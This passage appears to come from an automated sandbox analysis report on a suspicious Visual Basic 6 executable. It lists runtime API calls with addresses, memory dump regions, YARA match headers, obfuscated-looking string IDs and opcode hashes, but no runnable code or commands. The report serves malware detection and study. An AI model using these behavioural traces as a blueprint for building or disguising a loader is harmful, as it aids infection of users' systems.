                      • __vbaFreeVar.MSVBVM60(?,?,00401976), ref: 00413330
                      • __vbaNew2.MSVBVM60(00403B10,004223CC,?,?,Function_00001976), ref: 0041335F
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,00000014), ref: 004133C8
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000E8), ref: 00413431
                      • __vbaStrMove.MSVBVM60 ref: 0041346B
                      • __vbaFreeObj.MSVBVM60 ref: 00413477
                      • #702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004134A7
                      • __vbaStrMove.MSVBVM60 ref: 004134B5
                      • __vbaFreeVar.MSVBVM60 ref: 004134C1
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 004134E8
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413525
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B30,000000F8), ref: 00413576
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 004135A1
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004135DE
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B40,000000F0), ref: 0041362F
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041365A
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413697
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B50,00000100), ref: 004136E8
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 00413713
                      • __vbaChkstk.MSVBVM60(?), ref: 004137C9
                      • __vbaChkstk.MSVBVM60(?), ref: 004137F8
                      • __vbaChkstk.MSVBVM60(?), ref: 00413827
                      • __vbaChkstk.MSVBVM60(?), ref: 00413856
                      • __vbaChkstk.MSVBVM60(?), ref: 00413885
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,00000044), ref: 004138E7
                      • __vbaChkstk.MSVBVM60 ref: 00413930
                      • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00413963
                      • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00413980
                      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,Function_00001976), ref: 00413999
                      • #585.MSVBVM60(00000000,00000000,?,?,00401976), ref: 004139AD
                      • __vbaFpR8.MSVBVM60(?,?,00401976), ref: 004139B3
                      • __vbaNew2.MSVBVM60(00403B10,004223CC,?,?,?,?,?,?,?,?,?,Function_00001976), ref: 004139E4
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,00000014), ref: 00413A4D
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000E0), ref: 00413AB6
                      • __vbaStrMove.MSVBVM60 ref: 00413AF0
                      • __vbaFreeObj.MSVBVM60 ref: 00413AFC
                      • #611.MSVBVM60 ref: 00413B09
                      • __vbaStrMove.MSVBVM60 ref: 00413B14
                      • #569.MSVBVM60(0000004E), ref: 00413B2A
                      • #534.MSVBVM60(?,?,00401976), ref: 00413B3D
                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,00401976), ref: 00413B57
                      • #536.MSVBVM60(00000002), ref: 00413B8F
                      • __vbaStrMove.MSVBVM60 ref: 00413B9A
                      • __vbaFreeVar.MSVBVM60 ref: 00413BA6
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 00413BC6
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,00000014), ref: 00413C2F
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000F8), ref: 00413C98
                      • __vbaStrMove.MSVBVM60 ref: 00413CCF
                      • __vbaFreeObj.MSVBVM60 ref: 00413CDB
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 00413D02
                      • __vbaLateMemCallLd.MSVBVM60(00000002,?,vF5LV3hoE187,00000000), ref: 00413D3E
                      • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_00001976), ref: 00413D48
                      • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_00001976), ref: 00413D56
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,0000000C), ref: 00413D95
                      • __vbaFreeObj.MSVBVM60 ref: 00413DB3
                      • __vbaFreeVar.MSVBVM60 ref: 00413DBF
                      • __vbaStrCopy.MSVBVM60 ref: 00413DD7
                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00413DE5
                      • __vbaSetSystemError.MSVBVM60(00711E46,000773CF,?), ref: 00413E07
                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00413E35
                      • #554.MSVBVM60 ref: 00413E54
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 00413E74
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,00000014), ref: 00413EDD
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,00000078), ref: 00413F40
                      • __vbaFreeObj.MSVBVM60 ref: 00413F6C
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00413F8C
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413FC9
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B74,00000130), ref: 0041401A
                      • #532.MSVBVM60(?), ref: 00414039
                      • __vbaFreeStr.MSVBVM60 ref: 00414045
                      • __vbaFreeObj.MSVBVM60 ref: 00414051
                      • __vbaRecUniToAnsi.MSVBVM60(00403610,?,?,00000000,00000000,?,?,?,?,?,00401976), ref: 00414075
                      • __vbaRecUniToAnsi.MSVBVM60(004035F8,?,?,00000000,?,?,?,?,?,00401976), ref: 0041408F
                      • __vbaStrToAnsi.MSVBVM60(?,00403B88,00000000,00000000,?,?,?,?,?,00401976), ref: 004140A4
                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,?,?,?,?,?,00401976), ref: 004140BB
                      • __vbaRecAnsiToUni.MSVBVM60(00403610,?,?,?,?,?,?,?,00401976), ref: 004140D4
                      • __vbaRecAnsiToUni.MSVBVM60(004035F8,?,?,?,?,?,?,?,00401976), ref: 004140ED
                      • __vbaFreeStr.MSVBVM60 ref: 00414110
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041413F
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B00,0000004C), ref: 004141A8
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B8C,00000028), ref: 00414204
                      • __vbaFreeObj.MSVBVM60 ref: 00414222
                      • __vbaOnError.MSVBVM60(00000000), ref: 00414231
                      • __vbaFpI4.MSVBVM60 ref: 00414244
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033A8,00000064), ref: 0041427A
                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 004142A6
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 004142D6
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B00,00000014), ref: 0041433F
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,000000D8), ref: 004143A8
                      • __vbaStrMove.MSVBVM60 ref: 004143E2
                      • __vbaFreeObj.MSVBVM60 ref: 004143EE
                      • #611.MSVBVM60 ref: 004143FB
                      • __vbaStrMove.MSVBVM60 ref: 00414406
                      • __vbaFpI4.MSVBVM60 ref: 00414419
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033A8,000002C8), ref: 0041446B
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041449D
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004144DA
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$CheckHresult$Free$New2$Move$Chkstk$Ansi$Error$ListSystem$#611Construct2Late$#532#534#536#554#569#585#591#702AddrefCallCopy
                      • String ID: ~R$"$>]CK$C$Convulsibility$OMKRSLENS$QV$SHAMANERE$Strin$flyvske$h:@$k$motorboatman$vF5LV3hoE187$}#h$}#h$}#h$}#h$}#jPh8<@$}#jXh$}#j`h(<@$}#j`h0;@$}#jph(<@$}#jph0;@$}#jpht;@$}&h$}&h$}&h$}&h$}&h
                      • API String ID: 4048454160-840856454
                      • Opcode ID: 47e5a2b595849f4ee6bd017f6c19d9fcd144019be069c30672343e5280d4dd11
                      • Instruction ID: 4d9fdfd051ab3ab139ead9ba8565c7c523504c3a2200f025a9675c587ad5023a
                      • Opcode Fuzzy Hash: 47e5a2b595849f4ee6bd017f6c19d9fcd144019be069c30672343e5280d4dd11
                      • Instruction Fuzzy Hash: C263F9B4A00218DFDB24DF50CD88FDAB7B9BB88305F1045E9E60AA7291DB745AC5CF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaStrCopy.MSVBVM60 ref: 0042079E
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 004207B7
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004207D0
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B30,0000016C), ref: 004207F3
                      • __vbaFreeObj.MSVBVM60 ref: 004207FC
                      • #692.MSVBVM60(?,Columellae,Arriage), ref: 00420810
                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 00420828
                      • __vbaFreeVar.MSVBVM60 ref: 0042083B
                      • #535.MSVBVM60 ref: 00420843
                      • #705.MSVBVM60(?,00000000), ref: 0042085E
                      • __vbaStrMove.MSVBVM60 ref: 0042086F
                      • __vbaFreeVar.MSVBVM60 ref: 00420874
                      • #716.MSVBVM60(00000002,Legemsdelenes8,00000000), ref: 00420881
                      • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 004208A9
                      • __vbaFreeVar.MSVBVM60 ref: 004208B2
                      • __vbaCyStr.MSVBVM60(00403E84), ref: 004208C1
                      • __vbaFpCmpCy.MSVBVM60(00000000), ref: 004208CF
                      • #535.MSVBVM60 ref: 004208DD
                      • __vbaStrCat.MSVBVM60(:22,22:22), ref: 004208EF
                      • __vbaStrMove.MSVBVM60 ref: 004208FA
                      • #541.MSVBVM60(?,00000000), ref: 00420901
                      • __vbaStrVarMove.MSVBVM60(?), ref: 0042090B
                      • __vbaStrMove.MSVBVM60 ref: 00420916
                      • __vbaFreeStr.MSVBVM60 ref: 0042091B
                      • __vbaFreeVar.MSVBVM60 ref: 00420924
                      • __vbaHresultCheckObj.MSVBVM60(00000000,004018F8,004033A8,000002B0), ref: 00420982
                      • __vbaFreeStr.MSVBVM60(004209DC), ref: 004209C6
                      • __vbaFreeObj.MSVBVM60 ref: 004209CB
                      • __vbaFreeStr.MSVBVM60 ref: 004209D4
                      • __vbaFreeStr.MSVBVM60 ref: 004209D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$Move$#535CheckHresult$#541#692#705#716CopyLateNew2
                      • String ID: ~R$22:22$:22$Arriage$Columellae$Legemsdelenes8
                      • API String ID: 2203292901-3657355693
                      • Opcode ID: 05807b0a17efc79295688dfbcdb00120506db890ef3aa94b228aed7fd84655ad
                      • Instruction ID: 32ffba582070551e1e089978bdab66ee184d3ba65ddc1e1e07a782761440481a
                      • Opcode Fuzzy Hash: 05807b0a17efc79295688dfbcdb00120506db890ef3aa94b228aed7fd84655ad
                      • Instruction Fuzzy Hash: BF811B74E002199FDB04DFA4D988A9EBFB8FF48701F10812AE506B72A1DB745945CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • #615.MSVBVM60 ref: 0041EFCA
                      • #660.MSVBVM60(?,?,?,00000001,00000001), ref: 0041EFFD
                      • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041F01E
                      • __vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?), ref: 0041F035
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041F059
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,00000014), ref: 0041F07E
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B20,00000110), ref: 0041F0A8
                      • __vbaStrMove.MSVBVM60 ref: 0041F0BD
                      • __vbaFreeObj.MSVBVM60 ref: 0041F0C2
                      • #611.MSVBVM60 ref: 0041F0C8
                      • __vbaStrMove.MSVBVM60 ref: 0041F0D3
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041F0E8
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F107
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C28,00000188), ref: 0041F12A
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041F143
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F15C
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C28,00000178), ref: 0041F17F
                      • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 0041F18F
                      • __vbaNew2.MSVBVM60(00403B10,004223CC), ref: 0041F1AB
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00270C14,00403B00,0000004C), ref: 0041F1D0
                      • __vbaStrVarMove.MSVBVM60(00000002,?), ref: 0041F1E3
                      • __vbaStrMove.MSVBVM60 ref: 0041F1EE
                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403B8C,00000024), ref: 0041F20C
                      • __vbaStrMove.MSVBVM60 ref: 0041F21B
                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F22B
                      • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041F243
                      • __vbaFreeVar.MSVBVM60 ref: 0041F24F
                      • __vbaFreeStr.MSVBVM60(0041F2BA), ref: 0041F2AD
                      • __vbaFreeStr.MSVBVM60 ref: 0041F2B2
                      • __vbaFreeStr.MSVBVM60 ref: 0041F2B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$CheckHresult$Move$New2$List$#611#615#660CallLate
                      • String ID: ~R
                      • API String ID: 2982621179-4090886994
                      • Opcode ID: 6c188f0495d5d986989f1be6eec546790dd231c163e8a294426bb6b33695fd23
                      • Instruction ID: 212263c585e0191d889badcfce94124c906a7027722b94b8e25875198e7ad192
                      • Opcode Fuzzy Hash: 6c188f0495d5d986989f1be6eec546790dd231c163e8a294426bb6b33695fd23
                      • Instruction Fuzzy Hash: 3DA13C71900219AFDB10DF94DD88EEEBBB9FB48B01F10452AF501B72A1DBB45946CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl$IJG)
                      • API String ID: 0-1572324026
                      • Opcode ID: 50025a803021fe731bf84a49aaf37915eb7816d8b48712da628ee745624df99e
                      • Instruction ID: 4728b75341256584f36002597199472a9773f0676030bd8f2f942b19c493e677
                      • Opcode Fuzzy Hash: 50025a803021fe731bf84a49aaf37915eb7816d8b48712da628ee745624df99e
                      • Instruction Fuzzy Hash: 0A22BC71A046499FEB24CF29CC94BDAB7A1FF88300F55822AEC5D97341C734AE52CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl$IJG)
                      • API String ID: 0-1572324026
                      • Opcode ID: 25a9fc9654d8e725c3faf54c120f67788fdbc7ce0e18663fc6199029db1731b9
                      • Instruction ID: b45538a3fecd437e3a4a4a69d486f9cd58c056464f07d544cde4476df3a826f8
                      • Opcode Fuzzy Hash: 25a9fc9654d8e725c3faf54c120f67788fdbc7ce0e18663fc6199029db1731b9
                      • Instruction Fuzzy Hash: FCD1CC7160464A9FEB24CF29CC80BDAB7A6BF88700F55822EEC5D97341C734AE51CB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl$IJG)
                      • API String ID: 0-1572324026
                      • Opcode ID: 0ac6e90d9ea36f29fb45385d274a3dea4bda734c118a7964cbc8136b3c9ebfcb
                      • Instruction ID: 37b597dd3b3fa1bac9f6aa784ad1705baf24612733815ea70176c4c6e943fef2
                      • Opcode Fuzzy Hash: 0ac6e90d9ea36f29fb45385d274a3dea4bda734c118a7964cbc8136b3c9ebfcb
                      • Instruction Fuzzy Hash: 04D1CC7160464A9FEB28CF29CC80BDAB7A6BF88700F55822EDC5D87741C734AE51CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl$IJG)
                      • API String ID: 0-1572324026
                      • Opcode ID: d374fa6ccb235cda87c54ff7dde5082233cabc69b530dce986c16183c67a33ec
                      • Instruction ID: 1cde522d33f51639e3093645d8dcdbcb2c6de4c58259935182990ae96f5e453c
                      • Opcode Fuzzy Hash: d374fa6ccb235cda87c54ff7dde5082233cabc69b530dce986c16183c67a33ec
                      • Instruction Fuzzy Hash: 88C1B97160474ADFEB28CF29C884BDAB7A2BF88300F55822EDC5D87741C734AA51CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl
                      • API String ID: 0-1830534777
                      • Opcode ID: df0c8999193b4fc9c6d726d0f4d8883ab2dda63a9ae39eb58a3bbc26d601ce1a
                      • Instruction ID: be84475ca2254dac331fb64107077157ff80791f4307ed3d54c830a552e66613
                      • Opcode Fuzzy Hash: df0c8999193b4fc9c6d726d0f4d8883ab2dda63a9ae39eb58a3bbc26d601ce1a
                      • Instruction Fuzzy Hash: 4BB1BC716086499FEB34CF29CC847DAB7A6BF88300F55822AEC9D87341C774AE51CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl
                      • API String ID: 0-1830534777
                      • Opcode ID: cc40e5166888b8e9a3968d5da5e29c120918126e08fb4a6aee2c2d4e4a894a93
                      • Instruction ID: a2413898d72ebfb4f84435ac7b57054f5a368ad2c622bac253b0e776f594b0da
                      • Opcode Fuzzy Hash: cc40e5166888b8e9a3968d5da5e29c120918126e08fb4a6aee2c2d4e4a894a93
                      • Instruction Fuzzy Hash: 7691DE716082499FEB28CF29CC847EAB3A6BF98700F55422EEC9D87341C7349E51CB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl
                      • API String ID: 0-1830534777
                      • Opcode ID: a8bed1147dc4a8cebfa97c1f71c5be8df215eead3802646a5d3d8f831b6ae82e
                      • Instruction ID: 35120b56e2ab68af942ffcfb2861b7a68c7000b767471f26d42e5122c9d8b0cb
                      • Opcode Fuzzy Hash: a8bed1147dc4a8cebfa97c1f71c5be8df215eead3802646a5d3d8f831b6ae82e
                      • Instruction Fuzzy Hash: 6091FD716042459FEB28CF28CC847EAB3A6BF88700F55422EEC9987351C734AE51CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,Eel
                      • API String ID: 0-3783209504
                      • Opcode ID: 4a00fa40d35df473488bed343f7d9f99d85e9821c91039950fbed8d67b3b53a0
                      • Instruction ID: 542f9b1ab61d7f8a3be3573019faef776b6f5349bfc795b853abde2ae3a00f5a
                      • Opcode Fuzzy Hash: 4a00fa40d35df473488bed343f7d9f99d85e9821c91039950fbed8d67b3b53a0
                      • Instruction Fuzzy Hash: 7F8128B1904340CFEB249F38C849BEA77E1EF55310F55414FDC8A9B2A6C7389981CB8A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl
                      • API String ID: 0-1830534777
                      • Opcode ID: 82021e18d5b98ab916e2812742d8aa97792a6daa391efa80f1c27a97c0652476
                      • Instruction ID: 87c0697a7180076463683e63bf2553b1a6b6ae5feb8effe2093641d5cb7d6fc4
                      • Opcode Fuzzy Hash: 82021e18d5b98ab916e2812742d8aa97792a6daa391efa80f1c27a97c0652476
                      • Instruction Fuzzy Hash: F281CE716082459FEB28CF29CC85BEAB3A6BF88300F45422EEC59C7351C734AE51CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: isZ
                      • API String ID: 0-864423535
                      • Opcode ID: 59f31692e0b09c2fd687c5f874ace07b6c6da7af4364db8a031ffd17f6eca891
                      • Instruction ID: 4f40d41e96a72a1ade5f9293c8829f14a8ed993a86e48a31cc55dcc87193e228
                      • Opcode Fuzzy Hash: 59f31692e0b09c2fd687c5f874ace07b6c6da7af4364db8a031ffd17f6eca891
                      • Instruction Fuzzy Hash: D8611372A083489BDB348F298D883EBB7AAFF98710F56441FDC4997350E7745E458A42
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @Vnl
                      • API String ID: 0-1830534777
                      • Opcode ID: f7b587cf52ed5e9a6dbb9a1d6b92f6eb52b007dbc69b0490ebc8a700c66cf7fd
                      • Instruction ID: 752b991b961332ee12131d79044bd5771611e574e22ab8e98bb77d3fa1b47ec3
                      • Opcode Fuzzy Hash: f7b587cf52ed5e9a6dbb9a1d6b92f6eb52b007dbc69b0490ebc8a700c66cf7fd
                      • Instruction Fuzzy Hash: 2E71DE716046469FEB28DF28CC84BEAB3A2BF48700F55422AEC59C7351C735AE51CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: isZ
                      • API String ID: 0-864423535
                      • Opcode ID: f9ee9eb5a3f69260857839e14b731bb51e95be8e34134880c9e76bba8af4eec5
                      • Instruction ID: 9848f7d2c0d80dc83ca87ab85c7bfebd495989d92e940099f07ddfd1581e5a15
                      • Opcode Fuzzy Hash: f9ee9eb5a3f69260857839e14b731bb51e95be8e34134880c9e76bba8af4eec5
                      • Instruction Fuzzy Hash: 42611372A083589FDB308F298C883EBB7AAFF88710F56411FEC4997350D7744A458A46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,Eel
                      • API String ID: 0-3783209504
                      • Opcode ID: fcb5f50251dfe4eed9c709b422ee8bd73b77a42e6d7b01c977df5a206b5b1f1d
                      • Instruction ID: 20c8c8c461ff1bf17be5ee96f2554ddc5a269b0bb8c9583e98d5ce66995511f4
                      • Opcode Fuzzy Hash: fcb5f50251dfe4eed9c709b422ee8bd73b77a42e6d7b01c977df5a206b5b1f1d
                      • Instruction Fuzzy Hash: 035146B1904344CFEB289F34C988BEA77E5EF55310F16015FDC4A9B662C7348A41CB4A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: =e
                      • API String ID: 0-1858160283
                      • Opcode ID: b8160d2a9d445ed04fdfbebe0df67bd8fe6d60e4939b39f960482f67cbd34f8e
                      • Instruction ID: 528b99a813603d5165058d52664cb0c738df477dad8e51944583ad97f60e7e4f
                      • Opcode Fuzzy Hash: b8160d2a9d445ed04fdfbebe0df67bd8fe6d60e4939b39f960482f67cbd34f8e
                      • Instruction Fuzzy Hash: 455127B0900340DFEB64CF25C884BDA77A4FF09314F1181AADC598B266DB38DA418F99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: N]]c
                      • API String ID: 0-3846528522
                      • Opcode ID: 9f52ca7ba62dda8ce2516429098ad24f065d7342d3f45c1625515fb9d690d4ba
                      • Instruction ID: 29d3c6b10f420a3b4101726703aaba75c9a13b9f51d54761203411c2be46183f
                      • Opcode Fuzzy Hash: 9f52ca7ba62dda8ce2516429098ad24f065d7342d3f45c1625515fb9d690d4ba
                      • Instruction Fuzzy Hash: 12214B76A94214DFF730DE298841AEB73E6EFA5310F11801BDD869B205D33488438757
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f6ca02b5bbd99aca333a63d4e9e23ccee03d89b8e3c96948fad4507efd99e8bd
                      • Instruction ID: 62414bb499e605cc8a874bab19448020f300278e7a397901f75e617f34cb1aa9
                      • Opcode Fuzzy Hash: f6ca02b5bbd99aca333a63d4e9e23ccee03d89b8e3c96948fad4507efd99e8bd
                      • Instruction Fuzzy Hash: E751F1726083589FDB308F258C887EAB7AAFF88710F56411FEC4997310E7745E458A46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fb8f0fd581daa0706dc46e17efd8b259e0045fa6f43694b6503399cd6ad6d04
                      • Instruction ID: d7fa0100000afe657acc35125f6b6d5b989b2f6dddf6155dbec6762236010f88
                      • Opcode Fuzzy Hash: 5fb8f0fd581daa0706dc46e17efd8b259e0045fa6f43694b6503399cd6ad6d04
                      • Instruction Fuzzy Hash: 385148B1904344CFEB289E348988BEB77E5EF59310F16015FDC499B262C7348A40CB8A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89ce3cdc725539b67ef3f1d14630a496d1a8829c705d351ea8280d1e0c5b82f1
                      • Instruction ID: e18c435a3fcfe883ddbec6526e83b0fd2caace370950816bec58d3af0cc91e1b
                      • Opcode Fuzzy Hash: 89ce3cdc725539b67ef3f1d14630a496d1a8829c705d351ea8280d1e0c5b82f1
                      • Instruction Fuzzy Hash: 7D51EE72A083949FDB308F6A8C887EEB7AAEF88710F56411FEC4997250D7744E458A46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 429c93c9ec36d744488bb57ceedf9e37d58cf322fe309f28675a9618fe7898a5
                      • Instruction ID: e66fe13ef3a4e3c73d134410d27f9bd36cda3606bd822445dad9af318be13643
